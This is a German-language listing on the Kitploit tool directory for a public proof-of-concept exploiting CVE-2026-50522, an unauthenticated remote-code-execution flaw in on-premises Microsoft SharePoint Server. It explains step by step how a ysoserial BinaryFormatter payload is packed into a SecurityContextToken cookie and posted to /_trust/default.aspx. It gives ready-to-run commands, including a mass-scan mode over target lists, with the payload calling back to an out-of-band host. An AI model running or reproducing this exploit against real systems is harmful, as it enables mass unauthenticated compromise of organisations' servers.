Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/4minx/cve-2026-50522
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsRed Teaming
GitHub4minx/cve-2026-50522

CVE-2026-50522

CVE-2026-50522 PoC

Repository anzeigen
38172vor 25 TagenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-50522 Poc : SharePoint Deserialisierung RCE

Nicht authentifizierte Remotecodeausführung über SecurityContextToken-Cookie-Deserialisierung

Massenscan-Exploit für CVE-2026-50522, der lokale Microsoft SharePoint Server-Installationen angreift. Nutzt unsichere BinaryFormatter-Deserialisierung im WS-Federation-Endpunkt /_trust/default.aspx aus, um über präparierte SecurityContextToken-Cookies eine nicht authentifizierte Codeausführung zu erreichen.

Hinweis: Dieses Projekt enthält ysoserial, ein bekanntes Penetrationstest-Tool. Daher kann Ihr Antivirenprogramm es beim Download markieren oder unter Quarantäne stellen.


Informationen zur Sicherheitslücke

  • CVE: CVE-2026-50522
  • Typ: CWE-502 Deserialisierung nicht vertrauenswürdiger Daten
  • CVSS 3.1: 9.8 (Kritisch)
  • Authentifizierung: Nicht authentifiziert
  • Betroffen:
    • Microsoft SharePoint Server Subscription Edition (vor 16.0.19725.20434)
    • Microsoft SharePoint Server 2019 (vor 16.0.10417.20175)
    • Microsoft SharePoint Enterprise Server 2016 (vor 16.0.5561.1001)

Funktionsweise

  1. ysoserial.exe erzeugt ein mit BinaryFormatter serialisiertes Payload unter Verwendung des -Gadgets.
Tool herunterladen
TypeConfuseDelegate
  • Das Payload führt Invoke-WebRequest an eine Out-of-Band-Callback-URL aus.
  • Die Rohbytes werden (zlib) deflationiert und Base64-kodiert in einen Cookie-Wert.
  • Der Cookie wird in eine SecurityContextToken-XML-Struktur eingebettet.
  • Das Token wird in eine RequestSecurityTokenResponse (WS-Federation) eingebettet.
  • Der wresult-Parameter wird per POST an /_trust/default.aspx gesendet.
  • SharePoint deserialisiert das Token und löst im IIS-Worker-Prozess die Codeausführung aus.

  • Anforderungen

    • Python 3.10+ mit der requests-Bibliothek
    • ysoserial.net (Download)
    • OOB-Callback-Server (Burp Collaborator, interactsh, OAST)

    Verwendung

    Einzelnes Ziel

    root@kitploit:~
    python CVE-2026-50522.py -t http://10.10.10.5 -c http://YOUR_ID.oastify.com
    

    Massenscan

    root@kitploit:~
    python CVE-2026-50522.py -T targets.txt -c http://YOUR_ID.oastify.com
    

    Benutzerdefinierter ysoserial-Pfad

    root@kitploit:~
    python CVE-2026-50522.py -T targets.txt -c http://YOUR_ID.oastify.com --ysoserial C:\tools\ysoserial.exe
    

    Mit Proxy

    root@kitploit:~
    python CVE-2026-50522.py -T targets.txt -c http://YOUR_ID.oastify.com -x http://127.0.0.1:8080
    

    Subdomain-Callback-Modus

    root@kitploit:~
    python CVE-2026-50522.py -T targets.txt -c http://YOUR_ID.oastify.com --callback-mode subdomain
    

    Optionen

    ArgumentBeschreibungStandard
    -t, --targetEinzelne Ziel-URL-
    -T, --targetsDatei mit Ziel-URLs, eine pro Zeile-
    -c, --callback-urlOOB-Callback-Basis-URL (erforderlich)-
    --callback-modepath oder subdomainpath
    --ysoserialPfad zu ysoserial.exeysoserial.exe
    -x, --proxyHTTP-Proxykeine

    Callback-Modi

    Pfadmodus (Standard):

    root@kitploit:~
    http://YOUR_ID.oastify.com/10.10.10.5
    

    Subdomain-Modus:

    root@kitploit:~
    http://10.10.10.5.YOUR_ID.oastify.com
    

    Beispielausgabe

    root@kitploit:~
    [*] 50 target(s) | callback: http://abc123.oastify.com (path) | ysoserial: ysoserial.exe
    [10.10.10.5] [+] 200 [LOGIN_PAGE,AUTH_COOKIE]
    [10.10.10.6] [!] 200 [AMSI_BLOCKED]
    [10.10.10.7] [!] TIMEOUT
    [10.10.10.8] [!] SSL_ERR
    [10.10.10.9] [!] 403 [HTTP_403]
    
    [*] 45.2s | 50 total | 12 potential | 3 amsi | 5 failed
    

    Referenzen

    • Microsoft - CVE-2026-50522
    • SOCRadar - CVE-2026-50522-PoC befeuert SharePoint-Angriffe
    • thehackernews - Kritische SharePoint-RCE CVE-2026-50522 nach öffentlichem PoC aktiv ausgenutzt